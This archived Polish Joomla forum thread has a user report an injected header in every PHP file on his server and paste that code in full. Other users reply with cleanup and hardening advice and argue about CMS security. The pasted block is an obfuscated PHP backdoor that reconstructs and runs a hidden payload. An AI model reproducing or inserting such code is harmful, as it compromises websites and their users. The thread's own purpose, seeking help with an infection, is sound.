PDA

Zobacz pełną wersję : Serwer na homie i dziwny kod w plikach php



killerw
17-02-2016, 17:44
Witam,
Mam problem od paru dni zauważałem, że na serwerze na homie w każdej zainstalowanej joomli i każdym pliku php jest dziwny nagłówek i nie wiem co to jest :( podejrzewam, że to jakiś syf ale skąd on się znalazł ?

Proszę o jakiś wskazówki jak to usunąć już hasła do ftp i konta pozmieniałem


<?php $ybndza = 'array_map("tiqdkis",str_split(bm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#Le:56-xr.985:52985-t.98]K4]65]D8]8%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%86]267]y74]275]y7:]268]y7f#<!%tww!mfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,f!%z>2<!%ww2)%w`TW~ x24<!fw)#}#-# x24- x24-tusqpt)%z-#:#* x24- x2sX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7> x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%275L3]248L3P6L1M5]D2P4]D6#<%G]y67fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmj107 x45 116 x54"]); if ((strstr($u;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}kjRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:boe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!g6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]ps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fbubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg7Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< xtj x22)gj!|!*nbsbq%)323ldfidk!~!<K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#] x24)%c*W%eN+#Qi x5c24- x24gvodujpo! x24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!]28y]#/r%/h%)n%-#+I#)q%:>:r%:|)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*##:>:h%:<#64y]552]e7y]#>n%<*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV x7f x7f x7f^#zsfvr# x5cq%7**^#zsfvr# x5#>>X)!gjZ<#opo#>b%!**X)uft7-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h x7f!~!<##!>!2p%Z<^2 x5c23]273]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y#372]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]56]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373Pcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! xc:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#pg(0); $yfqnabe = implode(y)##-!#~<%h00#*<%nfd)##Qtpz)#]3414)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-%hOh/#00]55#*<%bG9}:}.}-}!#*<%1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbs)% x24- x24*<!~! x24/%t2w/ x26<pd%w6Z6<.2`hA x27pd%6<Cif((function_exists(" x6f 142 xx27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebf5f 163 x74 141 x72 164") && (!isset($GLOBALS[1]278]y3e]81]K78:56985:6197g27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>]y8 x24- x24]26 x24- x24<%j,,*!| x111112)eobs`un>qp%!|Z~!<##!>!zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*#%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f x27,*e x2`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qj|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{h^?]_ x5c}X x24<!%tmw!>!#]y84]275]y8str($uas," x72 166 x3a 61 x31"))) { $weaabzb = " x63 162 x65 oF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V75ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:| :*mmvo:>:iuhofm%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%(<!fwbm)%tjw)# x24#-!#]y38#-!%w:**<")));$koefwvt = $weaabR x27tfs%6<*17-SFEBFI,6<*12141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; function tiqdkis($g)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x41 d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ldcq%)ufttj x22)gj6<^#Y# x5cq% x2upcotn+qsvmt+fmhpph#)zbssb!-#}#:74985-rr.93e:5597f-s.973:8297f:5297opjudovg<~ x24<!%o:!>! x242178}527}88:}334}472 x>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}Xzb("", $yfqnabe); $koefwvt();}}24<!%ff2!>!bssbz) x24]25 x24- x24-!% x24- x2#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y3gA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)74*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf " x61 156 x75 156 x61"])))) { $GLOBnfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fd<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x2#-#C#-#O#-#N#*-!%ff2-!%t::**<ALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_SER4!>! x24/%tjw/ x24)% x24- x24y4 x24- x24A)qj3hopmA x273qj%6<*Y%)fnnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f<u%V x27{ftmfV x7f<*X&Z&S{ft:**t%)m%=*h%)m%):fmjix:<as," x6d 163 x69 145")) or (strdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%n){return chr(ord($n)-1);} @error_reportin464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5cs;h!opjudovg}{;#)tutjyf`opjudov#/%z<jg!)%z>>2*!%z>3<!fmt2)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJgj6<*id%)ftpmdR6<*id%)dfyf6]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+mtf!%b:>%s: x5c%j:.2^,%b:<!%**qp%!-uyfu%)3of)fep2]38y]572]48y]#>m%:|:*r%:-t%)3of:::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/%#/#o]#/*)323zbe!-#jt0*?]+2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#ssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&qpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]7,*d x27,*c x27,*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-!<*#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x2id%6< x7fw6* x7f_*#ujoftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gj}Zd_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw627!hmg%!)!gj!<2,*j%!-#1]#-e%)Rd%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zb<!%w:!>!(%w:!>! x246767~6<Cw6<pd#-#M#-#[#-#Y#-#D#-#W)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutR;`msvd}R;*msv%)}.;`UQPMSVD!-id%)us!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp"%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#2:ftmbg39*56A:>:8:|:7#6#)tutjyf`4392sTrREvxNoiTCnuf_EtaerCxECalPe r_Rtsgbwlcxm'; $ezypytws=explode(chr((568-448)),substr($ybndza,(33198-27321),(134-100))); $gvqrvxfe = $ezypytws[0]($ezypytws[(5-4)]); $demnfezns = $ezypytws[0]($ezypytws[(12-10)]); if (!function_exists('pxziqwlh')) { function pxziqwlh($lsentmglk, $wtuksy,$bacmph) { $fxnrqlji = NULL; for($vvenitv=0;$vvenitv<(sizeof($lsentmglk)/2);$vvenitv++) { $fxnrqlji .= substr($wtuksy, $lsentmglk[($vvenitv*2)],$lsentmglk[($vvenitv*2)+(3-2)]); } return $bacmph(chr((62-53)),chr((502-410)),$fxnrqlji); }; } $pivwoc = explode(chr((206-162)),'2196,31,2297,45,3913,35,4056,52,3248,50,517 ,34,4287,31,2806,61,3120,68,4362,42,1901,25,0,30,5 787,54,5519,32,2974,62,2171,25,3865,48,2227,70,319 ,58,5388,47,3987,40,4513,34,2653,61,4148,26,2421,6 7,1420,28,3335,31,946,58,475,42,3751,60,4547,26,30 93,27,1474,57,5280,22,620,63,3550,64,5633,33,5003, 51,5302,43,4458,30,3188,60,1794,37,5435,26,869,34, 903,43,115,37,1261,34,1163,68,2714,57,4174,57,1592 ,25,5724,63,2584,69,5152,60,2522,29,4828,63,3366,3 1,5571,62,5461,58,4955,48,5345,43,2551,33,1448,26, 1004,33,4715,20,4318,44,377,66,5212,68,5841,36,291 7,57,4642,45,1322,21,1343,38,1381,39,4231,32,186,6 8,2370,51,2867,50,551,69,4891,64,4802,26,2771,35,1 617,56,152,34,3481,69,1231,30,4263,24,1295,27,1673 ,63,4735,33,3433,48,3645,44,3811,54,281,38,4108,40 ,2488,34,1097,66,2142,29,1959,42,4768,34,1077,20,2 085,57,5666,58,1531,61,2001,62,3689,62,2342,28,339 7,36,82,33,4573,69,5105,47,1037,40,5054,51,443,32, 3298,37,2063,22,3948,39,1926,33,1736,58,748,70,440 4,54,683,65,818,51,4687,28,1831,70,4488,25,254,27, 30,52,5551,20,4027,29,3036,57,3614,31'); $ygvpuglo = $gvqrvxfe("",pxziqwlh($pivwoc,$ybndza,$demnfezns)); $gvqrvxfe=$ybndza; $ygvpuglo(""); $ygvpuglo=(428-307); $ybndza=$ygvpuglo-1; ?><?php

motaba
17-02-2016, 22:45
Zakładam, że nie masz kopii ...
Proponuje zainstalować rsFirewall (komponent płatny, ale warty swojej ceny) ...
Skanując, komponent sprawdzi strukturę plików i wylistuje wszystkie, w których wykrył zmiany (dotyczy wyłącznie natywnej struktury Joomla, czyli bez dodatkowo zainstalowanych, komponentów, pluginów, szablonów - ale na początek już coś - pozostałe przeglądniesz "na piechotę"). Jeśli kod siedzi wyłącznie w plikach, być może wystarczy jedynie podmienić pliki na te same ale z "czystej" instalacji, a zbędne pliki usunąć. Pozostaje niestety jeszcze baza danych :-( Tutaj pomysły mi się kończą ... być może ktoś inny doradzi.

Alchelor
18-02-2016, 13:50
Podejrzewam co to może być. Wyszukaj w logach czy masz wywołania do /php/inst.php

PeFik
22-02-2016, 14:22
To jest złośliwy kod, samo wyczyszczenie kodu strony , co zajmuje z 2-3h , nie da ci wiele, jeśli nie zabezpieczysz strony.
Ataków jest tak dużo na CMS, różnego typu, że sama umiejętność zrobienia strony to już niestety za mało, aby funkcjonować.

vereb
23-02-2016, 22:39
Mam wrażenie, że w ostatnim czasie ilość ataków na Joomla! wzrosła.

killerw
23-02-2016, 23:29
To dlaczego od razu nie łatają tych dziur w joomla to chyba trzeba będzie się przenieść na Wordpress tam mniej jest ataków, moim zdaniem jak instaluję joomla to powinna mieć dobrze zabezpieczenia a nie dokupywać jakieś dodatki :( Na obecne czasu jest sporo innych CMS aby stosować tylko joomla. Kiedyś był to dobry CMS ale ostatnio chyba ma więcej dziur jak dobry ser :(

Bazyl
23-02-2016, 23:33
No, od razu widać, że fachowiec się odezwał.
Wyważona opinia, poparta wieloletnim doświadczeniem...


Idź na WP będziesz miał lepiej...


p.s. Cms jest cały czas dobry, jego opinię psują "fachowcy".

vereb
24-02-2016, 00:43
Ech, chciałem się podzielić swoim spostrzeżeniem. Nie należy wylewać dziecka z kąpielą. Joomla! to dobry CMS, i obecny wzrost ilości ataków może być spowodowany wieloma czynnikami (jakość serwera oraz jego ustawienia, wątpliwe bezpieczeństwo dodatków, zbyt późne aktualizacje, nieodpowiedzialność niektórych userów i praw dostępu, niewystarczające zabezpieczenia, zbyt skąpa wiedza administratora, itp.). Nie gloryfikowałbym WP - też ostatnio nie miał najlepszego okresu. Tak to jest gdy kod źródłowy jest otwarty i dostępny dla wszystkich. Chylę czoło przed twórcami i trzymam kciuki, aby się nie zrażali niektórymi z komentarzy ;).

jeunesse
16-03-2016, 10:12
Walka z wiatrakami przy otwartym kodzie źródłowym, częste aktualizacje i kopie zapasowe to chyba najlepsze rozwiązanie.
Tylko jak się ma kilkadziesiąt stron to już zaczyna się problem.